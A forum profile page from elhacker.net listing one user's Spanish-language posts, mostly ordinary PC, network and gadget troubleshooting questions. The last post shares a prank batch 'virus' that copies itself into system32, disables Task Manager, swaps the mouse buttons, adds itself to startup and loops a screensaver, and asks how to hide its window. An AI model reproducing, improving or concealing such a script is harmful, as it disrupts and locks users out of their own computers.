elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: [1]
1  Informática / Hardware / Formatear PC en: 17 Mayo 2016, 19:11 pm
Buenas, el otro día a mi hermano le entraron a robar a casa y por desgracia se le llevaron el PC entre otras muchas cosas. Un amigo suyo le ha dejado un pc que tenía por ahí tirado para ir tirando (no lo necesita para más que ver algún vídeo de youtube, correo y word).
El problema es que es un pc bastante antiguo con sus 512 mb de RAM y no consigo hacer que funcione decentemente.

Se os ocurre qué podría hacer? Quizás instalar una versión ligera de Windows XP o algo por el estilo. He probado de momento poniéndole Windows Xp y Windows 7 pero ambos funcionan demasiado lento y se clava todo el rato. También probé a ponerle ubuntu 9.04 y rulaba perfecto el problema es que ya no se le da soporte y había mil problemas de compatibilidad con los navegadores.

A ver si a alguien se le ocurre algo, gracias.
2  Comunicaciones / Redes / Problema DMZ máquinas virtuales en: 26 Mayo 2015, 21:06 pm
Buenas noches caballeros,

Tengo la siguiente duda, a ver si alguien me la pudiese aclarar:

Tengo una máquina virtual IPCOP (Firewall) con tres interfaces de red, la ROJA red externa (que es una tarjeta de red virtual en modo NAT), una red local VERDE (que es otra tarjeta virtual en modo adaptador puente), y una DMZ NARANJA (que también es una tarjeta virtual en modo adaptador puente).

En la red DMZ tengo un servidor web que tendría que ser accesible desde el exterior, pero no consigo que funcione.

Estoy intentando lo siguiente, permitir acceso web desde fuera al puerto 80 y al 443 del servidor web ubicado en la DMZ NARANJA mediante reenviamiento de puertos (es decir, que si intentas acceder al puerto 80 del firewall te lleve al servidor web).

Alguna idea de que estoy haciendo mal?
3  Foros Generales / Dudas Generales / No bootable device en: 30 Octubre 2014, 22:59 pm
Buenas, el otro día se le estropeo el netbook a mi hermana (estos pc's portatiles pequeñitos con lo básico, no tiene ni para cd-rom). El mensaje que salia era éste "no bootable device insert boot disk and press any key". Estaba seguro de que era el disco duro ya que tiene unos años el pc y ya sabemos como van los discos duros, cuando llega su hora se acabó. Así que se fue a comprar uno igual, lo he conectado a mi pc y le he instalado el windows pero cuando lo enxufo en su pc sigue dando el mismo mensaje, es como si no reconociese el disco. Me he dado cuenta de que al instalar el windows en mi ordenador y no en el suyo (lo he hecho así porque no podía insertar el cd en el netbook) se me ha instalado una especie de GRUB y ahora al iniciar mi pc me salen 2 opciones de Windows para iniciar. Podría ser que no inicie el windows en el netbook porque se me ha instalado el GRUB/MBR en mi pc?? Como podría solucionarlo o otras sugerencias?

Acudo a vosotros, maestros de la informática porque estoy perdido, guiadme el camino por favor  :)
4  Comunicaciones / Redes / Subidas de latencia inexplicables en: 1 Mayo 2014, 02:19 am
Buenas, desde hace un par de días a la hora de jugar online a League of Legends estoy experimentando unas subidas de latencia que me hacen imposible jugar bien ya que se me queda clavado por unos segundos cada dos por tres. He probado un montón de cosas (limpiar el registro, actualizar los drivers de la tarjeta de red, desactivar todos los programas que consuman ancho de banda, limpiar la cache de DNS, probar con un DNS distinto...) pero no consigo dar con el problema.

Al principio pensaba que podía ser problema del juego pero con el juego cerrado he probado de pingear a google y también me dan subidas de latencia muy grandes de repente.

Aquí podéis comprobar a lo que me refiero




Incluso haciendo ping a mi router me dan estas subidas de latencia



O si otro ordenador de la red me hace ping a mi ordenador también pasa lo mismo.

Otra cosa que debo comentar es que sólo le ocurre a mi ordenador, he probado con el resto de pc's de la casa y no les ocurre este error.

Si alguien fuese capaz de ayudarme con este problema le estaría muy agradecido, realmente estoy desesperado y confuso. Gracias de antemano
5  Foros Generales / Dudas Generales / Recuperar archivos netbook en: 19 Julio 2013, 20:20 pm
Buenas, pues tengo este ordenador acer aspire que un día de repente dejo de arrancar diciendo que había un problema en el sistema operativo. Antes de reinstalarlo me gustaría recuperar los archivos que tenía antes, pero como no tiene ninguna ranura para meter cd he tenido que hacer un usb arrancable sin mucho éxito.
He seguido los pasos que ponen en la página de ubuntu http://www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows
con el programa Universal USB installer. Lo pongo en el netbook arranco desde usb y me sale bien la pantalla de inicio (he bajado ubuntu 9.10) donde te da a escoger si quieres instalar, arrancar, hacer un memory test.. ahí le doy a probar ubuntu sin instalar nada y cuando empiezan a salir los numeritos esos mientras arranca el sistema operativo se queda clavado y no hace nada más.

Agradecería mucho alguna sugerencia o quizás otro método para poder recuperar mis archivos, muchas gracias.
6  Comunicaciones / Android / Actualización Whatsapp en: 10 Julio 2013, 17:54 pm
Buenas, ayer me obligaron a actualizar whatsapp como suele pasar cada cierto tiempo, el problema es que cuando le doy al boton de descarga me da un error diciendo que no se encontró la ubicación. He optado por desintalar whatsapp pero ahora no me aparece en el Market y no puedo volver a instalarlo.

A alguien le ha pasado algo parecido, sabéis como solucionarlo?
Tengo un HTC hero con firmware 2.1, es que whatsapp ha dejado de dar soporte los móviles más antiguos o algo?

Gracias de antemano.
7  Comunicaciones / Redes / Ping muy alto en: 3 Diciembre 2012, 23:42 pm
Buenas, hace unos días me monté mi pc nuevecito y parecía que iba todo muy bien, pero a la hora de jugar me estoy 2 o 3 minutos y me empieza a subir y bajar el ping todo el rato, entre 70 ms hasta 200-300, depende del día.

El tema es que no se que pasa, he probado con otros pc's y tienen un ping de unos 20-30ms que es lo que solía tener.

Primero pensé que sería el firewall, lo desactivé y nada, seguía igual, luego pensé que quizás era el DNS que estaba mal configurado o algo, pero que va, tampoco.

He pasado el CCcleaner, el Anti malware... pero la verdad es que dudo mucho que me haya entrado algo, llevo 1 semana con el sistema instalado y no he hecho nada fuera de lo normal.

Alguna sugerencia? Me compré el pc nuevo pa que me fuese flechao de fps y ahora me va lento de ms... paradojas de la vida.

En fin espero que alguien pueda echarme una mano, gracias.
8  Informática / Electrónica / Arreglar un ipod en: 30 Noviembre 2012, 18:31 pm
Buenas, el otro día iba paseando con mi bici y se me cayó el ipod al suelo. Lo fui a recoger y la pantalla estaba intacta, pero el ipod se ha quedado en bloqueo de forma permanente.
No puedo darle al play, cambiar de cancion... nada y por mucho que lo bloquee/desbloquee sigue bloqueado.
El tema es que ya no tiene garantía y estoy bastante seguro que es un tema de la palanquita ésta de bloqueo/desbloqueo que al caerse se ha movido o algo.
Que haríais vosotros? Alguien tiene experiencia abriendo algun ipod o algo parecido? Una vez abierto y ojalá arreglado como podría volver a cerrarlo, soldandolo?

Gracias.
9  Informática / Hardware / Comprarme un ordenador nuevo en: 29 Octubre 2012, 22:43 pm
Hola a todos, había pensado en comprarme un ordenador nuevo y quería que me aconsejáseis un poco  para escoger la mejor opción. De hecho serían 2 ordenadores, uno portátil y uno de sobremesa.

Vivo en Barcelona, por lo que si me sugerís alguna tienda estaría bien que la puediese encontrar por la zona.

Mi presupuesto estaría entre 400 y 600 euros para ambos, el de sobremesa y el portátil.

Mi intención no es correr 5 juegos a la vez mientras estoy renderizando un vídeo, pero algo que me pudiese correr por ejemplo el Diablo 3 o el Call of Duty sin demasiados problemas. He mirado en el mediamarkt y el fnac y hay algunos que no estan del todo mal(i3, 4gb ddr3, 320gb, AMD Radeon™ HD 7470 por 479€ ASUS), pero no acabo de decidirme.

Otra opción quizás seria ir al pc green o otra tienda similar y montarme el pc yo mismo pieza a pieza. Que es lo que haríais vosotros? A ver si alguien puede echarme una mano y me decido.

Muchas gracias por adelantado ;)
10  Programación / Scripting / virusillo batch en: 2 Octubre 2012, 20:50 pm
Buenas, hoy me aburria un poco en clase y me he puesto a hacer un bat que si más no, es un poco molesto :P

Os cuelgo el código
Código
  1. @echo off
  2. copy virus.bat "C:\WINDOWS\system32\virus.bat"
  3. REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  4. RUNDLL32.EXE user32.dll,SwapMouseButton
  5. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "Salvapantallas" /t REG_SZ /d "C:\WINDOWS\system32\virus.bat"
  6.  
  7.  
  8.  
  9.  
  10. :loop
  11. ssbezier.scr /S /Q /R
  12. goto loop
  13.  
Se que hay muchas cosas que estan bastante mal, me gustaria que me diéseis vuestra opinion y si podeis arreglar o aportar algo seria genial xD

Basicamente lo que hace es copiarse a system 32, deshabilita el administrador de tareas, invierte los botones del mouse (el derecho pasa a ser el izquierdo y viceversa) y se añade al Run, para que se ejecute al iniciar el ordenador. Luego lo único que hace es llamar constantemente a un salvapantallas. Me gustaria saber si habria alguna forma de poder ejecutarlo en segundo plano, ya que si se abre la ventana del cmd es relativamente facil cerrarlo (aun y que el boton del mouse cambia de lado y es bastante confuso) y el salvapantallas acaba dando dolor de cabeza, al borde de un ataque de epilepsia jaja.

En fin a ver si hay algun crack por ahi que consiga alguna solución, y espero que os guste.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines